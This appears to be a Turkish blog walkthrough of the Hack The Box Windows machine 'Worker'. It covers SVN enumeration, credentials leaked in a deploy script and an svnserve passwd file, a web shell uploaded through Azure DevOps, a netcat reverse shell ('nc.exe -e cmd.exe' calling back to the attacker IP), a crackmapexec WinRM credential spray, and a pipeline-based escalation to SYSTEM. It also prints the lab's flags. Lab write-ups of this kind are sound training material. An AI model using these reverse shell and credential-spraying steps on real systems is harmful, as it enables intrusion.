İçeriğe geç

Worker

Makine Adı Seviye OS Logo
Worker - HTB Orta Windows

Walkthrough

nmap taraması ile başlayalım.


PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3690/tcp open  svnserve Subversion
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

svn tespit ettikten sonra enum yapmaya başladım aynı zamanda vsman açık bu bir kullanıcı tespit edebilirsek bağlantı kurabileceğimiz anlamına geliyor. svn olması ile bir yazılım projesi olabileceğini bende düşündürdü. svn ile ilgili incelemelerim aşağıda


┌──(root💀kali)-[~/oscp/htb/Worker]
└─# svn ls svn://10.10.10.203
dimension.worker.htb/
moved.txt

┌──(root💀kali)-[~/oscp/htb/Worker]
└─# svn log svn://10.10.10.203
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020) | 1 line

Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 09:50:20 -0400 (Sat, 20 Jun 2020) | 1 line

Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 09:46:19 -0400 (Sat, 20 Jun 2020) | 1 line

-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 09:45:16 -0400 (Sat, 20 Jun 2020) | 1 line

Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020) | 1 line

First version
------------------------------------------------------------------------

┌──(root💀kali)-[~/oscp/htb/Worker]
└─# svn checkout svn://10.10.10.203
A    dimension.worker.htb
A    dimension.worker.htb/LICENSE.txt
A    dimension.worker.htb/README.txt
A    dimension.worker.htb/assets
A    dimension.worker.htb/assets/css
A    dimension.worker.htb/assets/css/fontawesome-all.min.css
A    dimension.worker.htb/assets/css/main.css
A    dimension.worker.htb/assets/css/noscript.css
A    dimension.worker.htb/assets/js
A    dimension.worker.htb/assets/js/breakpoints.min.js
A    dimension.worker.htb/assets/js/browser.min.js
A    dimension.worker.htb/assets/js/jquery.min.js
A    dimension.worker.htb/assets/js/main.js
A    dimension.worker.htb/assets/js/util.js
A    dimension.worker.htb/assets/sass
A    dimension.worker.htb/assets/sass/base
A    dimension.worker.htb/assets/sass/base/_page.scss
A    dimension.worker.htb/assets/sass/base/_reset.scss
A    dimension.worker.htb/assets/sass/base/_typography.scss
A    dimension.worker.htb/assets/sass/components
A    dimension.worker.htb/assets/sass/components/_actions.scss
A    dimension.worker.htb/assets/sass/components/_box.scss
A    dimension.worker.htb/assets/sass/components/_button.scss
A    dimension.worker.htb/assets/sass/components/_form.scss
A    dimension.worker.htb/assets/sass/components/_icon.scss
A    dimension.worker.htb/assets/sass/components/_icons.scss
A    dimension.worker.htb/assets/sass/components/_image.scss
A    dimension.worker.htb/assets/sass/components/_list.scss
A    dimension.worker.htb/assets/sass/components/_table.scss
A    dimension.worker.htb/assets/sass/layout
A    dimension.worker.htb/assets/sass/layout/_bg.scss
A    dimension.worker.htb/assets/sass/layout/_footer.scss
A    dimension.worker.htb/assets/sass/layout/_header.scss
A    dimension.worker.htb/assets/sass/layout/_main.scss
A    dimension.worker.htb/assets/sass/layout/_wrapper.scss
A    dimension.worker.htb/assets/sass/libs
A    dimension.worker.htb/assets/sass/libs/_breakpoints.scss
A    dimension.worker.htb/assets/sass/libs/_functions.scss
A    dimension.worker.htb/assets/sass/libs/_mixins.scss
A    dimension.worker.htb/assets/sass/libs/_vars.scss
A    dimension.worker.htb/assets/sass/libs/_vendor.scss
A    dimension.worker.htb/assets/sass/main.scss
A    dimension.worker.htb/assets/sass/noscript.scss
A    dimension.worker.htb/assets/webfonts
A    dimension.worker.htb/assets/webfonts/fa-brands-400.eot
A    dimension.worker.htb/assets/webfonts/fa-brands-400.svg
A    dimension.worker.htb/assets/webfonts/fa-brands-400.ttf
A    dimension.worker.htb/assets/webfonts/fa-brands-400.woff
A    dimension.worker.htb/assets/webfonts/fa-brands-400.woff2
A    dimension.worker.htb/assets/webfonts/fa-regular-400.eot
A    dimension.worker.htb/assets/webfonts/fa-regular-400.svg
A    dimension.worker.htb/assets/webfonts/fa-regular-400.ttf
A    dimension.worker.htb/assets/webfonts/fa-regular-400.woff
A    dimension.worker.htb/assets/webfonts/fa-regular-400.woff2
A    dimension.worker.htb/assets/webfonts/fa-solid-900.eot
A    dimension.worker.htb/assets/webfonts/fa-solid-900.svg
A    dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
A    dimension.worker.htb/assets/webfonts/fa-solid-900.woff
A    dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
A    dimension.worker.htb/images
A    dimension.worker.htb/images/bg.jpg
A    dimension.worker.htb/images/overlay.png
A    dimension.worker.htb/images/pic01.jpg
A    dimension.worker.htb/images/pic02.jpg
A    dimension.worker.htb/images/pic03.jpg
A    dimension.worker.htb/index.html
A    moved.txt
Checked out revision 5.

┌──(root💀kali)-[~/oscp/htb/Worker]
└─# s                              
s: command not found

┌──(root💀kali)-[~/oscp/htb/Worker]
└─# ls                                                                                                                                                                                                                                  127 ⨯
10.10.10.203  dimension.worker.htb  gobuster1  gobuster2  moved.txt

┌──(root💀kali)-[~/oscp/htb/Worker]
└─# cat moved.txt       
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb

// The Worker team :)

/etc/hosts dosyamı güncellendikten sonra svn'deki diğer versiyonları kontrol edereke devam etmeye başladım.


┌──(root💀kali)-[~/oscp/htb/Worker/dimension.worker.htb]
└─# cd ..                  

┌──(root💀kali)-[~/oscp/htb/Worker]
└─# svn up -r 2
Updating '.':
D    moved.txt
A    deploy.ps1
Updated to revision 2.

┌──(root💀kali)-[~/oscp/htb/Worker]
└─# ls -al        
total 32
drwxr-xr-x  5 root root 4096 Aug 10 06:31 .
drwxr-xr-x 26 root root 4096 Aug 10 05:10 ..
drwxr-xr-x  4 root root 4096 Aug 10 05:28 10.10.10.203
-rw-r--r--  1 root root  271 Aug 10 06:31 deploy.ps1
drwxr-xr-x  4 root root 4096 Aug 10 06:19 dimension.worker.htb
-rw-r--r--  1 root root 1065 Aug 10 06:19 gobuster1
-rw-r--r--  1 root root 1093 Aug 10 06:21 gobuster2
drwxr-xr-x  4 root root 4096 Aug 10 06:18 .svn

┌──(root💀kali)-[~/oscp/htb/Worker]
└─# cat deploy.ps1 
$user = "nathen" 
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")

Harika bir kullanıcı tespit ettik vsman'a bağlanmayı denedim ancak başarılı olamadım. Bunun üzerine http://devops.worker.htb adresine gittiğimde çıkan basic authentication'a nathen:wendel98 bilgileri ile giriş yapabildim. Sağlık bakanlığında yazılımcı olarak çalışırken süreç takibi için TFS kullanırdık. Microsoft'uy seviyorum ve Azur üzerinde yine benzer bir TFS var. Tasklar gelmiş bu tasklara uygun commitler girilmiş. Amacımın bu projelerden birine reverse atıp makineye bağlantı kurmak olduğu çok açıktı.

Bir proje seçtim ve yeni bir branch oluşturdum daha sonrasında bunu merge ettim böylece web shel'imi yükleyebildim. Bununla alakalı ekran görünüsü aşağıda yer almaktadır.

Şimdi web shelli görüntüleyelim. Bunun için /etc/hosts dosyamı tekrardan güncelledim.

Kalimde bir smb başlattım ve karşı makineye nc.exe attım. Daha sonrasında reverse aldım.


┌──(root💀kali)-[~/oscp/htb/Worker]
└─# /usr/local/bin/smbserver.py KUDAY . -smb2support                                                                                                                                                                                    130 ⨯
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.203,52693)
[*] AUTHENTICATE_MESSAGE (\,WORKER)
[*] User WORKER\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:KUDAY)
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:KUDAY)
[*] Closing down connection (10.10.10.203,52693)
[*] Remaining connections []

nc.exe'yi göndermek için kullandığım payload: copy \\10.10.14.5\KUDAY\nc.exe C:\Windows\Temp\nc.exe

C:\Windows\Temp\nc.exe -e cmd.exe 10.10.14.5 443

┌──(root💀kali)-[~/oscp/htb/Worker]
└─# nc -lvp 443 
listening on [any] 443 ...
connect to [10.10.14.5] from alpha.worker.htb [10.10.10.203] 52695
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.

w:\sites\alpha.worker.htb>

Bu aşamdan sonra çokça inceleme yaptım otomatik scriptleri kullandım ancak işe yarar bir şey çıkmadı. Daha sonrasında w:\ diskinde manuel incelemeler yapmaya başladım. Powershell başlatım aşağıdaki komutu girdiğimde ilginç sonuçlar aldım.

Get-ChildItem -Recurse | Select-String "pass" -List | Select Path

...
W:\sites\twenty.worker.htb\assets\webfonts\fa-regular-400.svg         
W:\sites\twenty.worker.htb\assets\webfonts\fa-regular-400.ttf         
W:\sites\twenty.worker.htb\assets\webfonts\fa-solid-900.eot           
W:\sites\twenty.worker.htb\assets\webfonts\fa-solid-900.svg           
W:\sites\twenty.worker.htb\assets\webfonts\fa-solid-900.ttf           
W:\svnrepos\www\conf\passwd                                           
W:\svnrepos\www\conf\svnserve.conf                                    
W:\svnrepos\www\db\revs\0\1                                           
W:\svnrepos\www\db\revs\0\3                                           
W:\svnrepos\www\hooks\post-commit.tmpl                                
W:\svnrepos\www\hooks\post-lock.tmpl                                  
W:\svnrepos\www\hooks\post-revprop-change.tmpl                        
W:\svnrepos\www\hooks\post-unlock.tmpl                                
W:\svnrepos\www\hooks\pre-commit.tmpl                                 
W:\svnrepos\www\hooks\pre-lock.tmpl                                   
W:\svnrepos\www\hooks\pre-revprop-change.tmpl                         
W:\svnrepos\www\hooks\pre-unlock.tmpl                                 
W:\svnrepos\www\hooks\start-commit.tmpl   

passwd dosyasını okuduğumda kullanıcı adları ve parolalar buldum. Hemen bunları test edelim.


PS W:\svnrepos\www\conf> cat passwd
cat passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday

Hızlıca wordlistlerimi oluşturdum.

┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# cat cred       
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday

┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# cat convert.py    
dosya = open("cred")
cred = dosya.read().split("\n")
dosya.close()

username=[]
password=[]

dosya4username = open("username","a")
dosya4password = open("password","a")
for i in cred:
    dosya4username.write(i.replace("="," ").split()[0]+"\n")
    dosya4password.write(i.replace("="," ").split()[1]+"\n")
dosya4username.close()
dosya4password.close()

┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# python3 convert.py
Traceback (most recent call last):
  File "/root/oscp/htb/Worker/Users/convert.py", line 11, in <module>
    dosya4username.write(i.replace("="," ").split()[0]+"\n")
IndexError: list index out of range

┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# cat username                                                                                                                                                        1 ⨯
nathen
nichin
nichin
noahip
nuahip
oakhol
owehol
paihol
parhol
pathop
pauhor
payhos
perhou
peyhou
phihou
quehub
quihud
rachul
raehun
ramhun
ranhut
rebhyd
reeinc
reeing
reiing
renipr
rhiire
riairv
ricisa
robish
robisl
robive
ronkay
rubkei
rupkel
ryakel
sabken
samken
sapket
sarkil

┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# cat password 
wendel98
fqerfqerf
asifhiefh
player
wkjdnw
bxwdjhcue
supersecret
painfulcode
gitcommit
iliketomoveit
nowayjose
icanjive
elvisisalive
ineedvacation
pokemon
pickme
kindasecure
guesswho
idontknow
thisis
getting
rediculous
iagree
tosomepoint
isthisenough
dummy
users
canyou
seewhich
onesare
wolves11
andwhich
onesare
the
sheeps
imtired
drjones
aqua
hamburger
friday

Orada pythonda bir hata var ancak programın sonunda gerçekleşen bir durum, pythondan anlayabnlar anlayacaktır. Dosya okuma işlemi yaparken son satırda boş elemanlar olmasından kaynaklanıyor. Korkulacak bir şey yok. Şimdi deneyelim!

┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# crackmapexec winrm  -u username -p password --no-bruteforce 10.10.10.203
WINRM       10.10.10.203    5985   NONE             [*] None (name:10.10.10.203) (domain:None)
WINRM       10.10.10.203    5985   NONE             [*] http://10.10.10.203:5985/wsman
WINRM       10.10.10.203    5985   NONE             [-] None\nathen:wendel98
WINRM       10.10.10.203    5985   NONE             [-] None\nichin:fqerfqerf
WINRM       10.10.10.203    5985   NONE             [-] None\nichin:asifhiefh
WINRM       10.10.10.203    5985   NONE             [-] None\noahip:player
WINRM       10.10.10.203    5985   NONE             [-] None\nuahip:wkjdnw
WINRM       10.10.10.203    5985   NONE             [-] None\oakhol:bxwdjhcue
WINRM       10.10.10.203    5985   NONE             [-] None\owehol:supersecret
WINRM       10.10.10.203    5985   NONE             [-] None\paihol:painfulcode
WINRM       10.10.10.203    5985   NONE             [-] None\parhol:gitcommit
WINRM       10.10.10.203    5985   NONE             [-] None\pathop:iliketomoveit
WINRM       10.10.10.203    5985   NONE             [-] None\pauhor:nowayjose
WINRM       10.10.10.203    5985   NONE             [-] None\payhos:icanjive
WINRM       10.10.10.203    5985   NONE             [-] None\perhou:elvisisalive
WINRM       10.10.10.203    5985   NONE             [-] None\peyhou:ineedvacation
WINRM       10.10.10.203    5985   NONE             [-] None\phihou:pokemon
WINRM       10.10.10.203    5985   NONE             [-] None\quehub:pickme
WINRM       10.10.10.203    5985   NONE             [-] None\quihud:kindasecure
WINRM       10.10.10.203    5985   NONE             [-] None\rachul:guesswho
WINRM       10.10.10.203    5985   NONE             [-] None\raehun:idontknow
WINRM       10.10.10.203    5985   NONE             [-] None\ramhun:thisis
WINRM       10.10.10.203    5985   NONE             [-] None\ranhut:getting
WINRM       10.10.10.203    5985   NONE             [-] None\rebhyd:rediculous
WINRM       10.10.10.203    5985   NONE             [-] None\reeinc:iagree
WINRM       10.10.10.203    5985   NONE             [-] None\reeing:tosomepoint
WINRM       10.10.10.203    5985   NONE             [-] None\reiing:isthisenough
WINRM       10.10.10.203    5985   NONE             [-] None\renipr:dummy
WINRM       10.10.10.203    5985   NONE             [-] None\rhiire:users
WINRM       10.10.10.203    5985   NONE             [-] None\riairv:canyou
WINRM       10.10.10.203    5985   NONE             [-] None\ricisa:seewhich
WINRM       10.10.10.203    5985   NONE             [-] None\robish:onesare
WINRM       10.10.10.203    5985   NONE             [+] None\robisl:wolves11 (Pwn3d!)
robisl:wolves11

Harika! evil-winrm ile bağlantı kuralım.


┌──(root💀kali)-[~/oscp/htb/Worker]
└─# evil-winrm -i 10.10.10.203 -u robisl -p wolves11                                                                                                                                                                                    130 ⨯

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\robisl\Documents> cd ..
*Evil-WinRM* PS C:\Users\robisl> ls

    Directory: C:\Users\robisl

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---         4/5/2020   7:32 PM                Desktop
d-r---         4/4/2020  11:35 PM                Documents
d-r---        9/15/2018   9:12 AM                Downloads
d-r---        9/15/2018   9:12 AM                Favorites
d-r---        9/15/2018   9:12 AM                Links
d-r---        9/15/2018   9:12 AM                Music
d-r---        9/15/2018   9:12 AM                Pictures
d-----        9/15/2018   9:12 AM                Saved Games
d-r---        9/15/2018   9:12 AM                Videos

cd*Evil-WinRM* PS C:\Users\robisl> cd Desktop
*Evil-WinRM* PS C:\Users\robisl\Desktop> ls

    Directory: C:\Users\robisl\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        8/10/2021   8:59 PM             34 user.txt

cat*Evil-WinRM* PS C:\Users\robisl\Desktop> cat user.txt
5455ed43a205185208157dcc76502d43
*Evil-WinRM* PS C:\Users\robisl\Desktop> 

Daha sonrasında bu kullanıcı ile azur'a tekrar bağlandım ve daha farklı bir proeje gördüm. Pipelines oluşturabildiğimi fark ettim. Devops kısmı çok hakim olduğum bir alan değil bunu başta belirtmemde fayda var o yüzden emin olmadığım bazı şeylerden burada bahsetmeyeceğim. Pentester academy'nin eğitimlerii bekliyorum 🙂 Ancak piplines aracılığı ile işletim sistemi seviyesinde kod çalıştırabildiğimi biliyorum. Aşağıdaki şekilde bir kod çalıştırdığımda root haklarında (sözüm ona makine windows) reverse alabildim.

┌──(root💀kali)-[~/oscp/htb/Worker]
└─# nc -lvp 443                                                                                                  1 ⨯
listening on [any] 443 ...
connect to [10.10.14.5] from devops.worker.htb [10.10.10.203] 50788
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.

W:\agents\agent11\_work\8\s>whoami
whoami
nt authority\system

W:\agents\agent11\_work\8\s>c:
c:

C:\>dir "*root*.txt" /s /p
dir "*root*.txt" /s /p
 Volume in drive C has no label.
 Volume Serial Number is 32D6-9041

 Directory of C:\Users\Administrator\Desktop

2021-08-10  20:59                34 root.txt
               1 File(s)             34 bytes

     Total Files Listed:
               1 File(s)             34 bytes
               0 Dir(s)  10 384 883 712 bytes free

C:\>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>dtype root.txt
dtype root.txt
'dtype' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Administrator\Desktop>type root.txt
type root.txt
fdae81646ff993d7125b423f6fd93f8d
Kategori:DevopsWalkthroughWindows

İlk Yorumu Siz Yapın

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir